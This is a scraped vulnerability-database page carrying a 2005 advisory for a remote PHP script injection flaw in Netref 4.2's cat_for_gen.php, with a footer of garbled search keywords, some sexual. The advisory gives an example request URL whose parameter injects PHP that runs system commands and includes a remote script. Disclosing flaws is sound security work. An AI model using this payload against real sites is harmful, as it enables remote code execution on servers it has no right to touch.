about advertise contact
Search: Home Vulnerabilities Exploits News Articles RSS Feeds Archive Talk

exploits , vulnerabilities , articles , Netref Cat_for_gen.PHP Remote PHP Script Injection Vulnerability


Title Netref Cat_for_gen.PHP Remote PHP Script Injection Vulnerability
Published 2005-04-20-12:00AM
Updated 2005-04-20-04:45PM
Class Input Validation Error
CVE   CVE-MAP-NOMATCH
Remote  Yes
Local  No
Credit  jaguar <webmaster@wulab.com> is credited with the discovery of this issue.
Vulnerable  Netref Netref 4.2
Not Vulnerable  
Code   No exploit is required to leverage this issue. The following example is available:
http://www.yourdomain.com/[netref_folder]/script/cat_for_gen.php?ad=1&ad_direct=../&m_for_racine=</option></SELECT><?php system($command);include($remote_script)?>
TXT  t3xt 1t!


Advertising

Copyright 2007, SecurityDot
Fri, 18 Dec 2009 17:32:16 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
Ashwariya mario kart 2.4.25 loc Cisco IOS mambo Remo Squid FTP /search/ex news for c AppServ+Op cat fuck g www.ziye.o Cr//r//n00 news for c Cowlist bigbutts.c Coppermine Searching www.wsqshu Conge Widexl CMS is Fre Sagilasexm Condom use www.dfdy.c 10.1.4 Common.htm apache 1.3 S....com%2 ftvangles Bideoporno Sexcy ram Commerce S S....com%2 LPRng ftvangles Bideoporno Www.sexyim news for c download f CMS is Fre Collge wal iiceguwaga MS04-021 Wwwworldse Hello, nic only sex.c o my goody Www.Sexi.G xoops rfi Codec+1110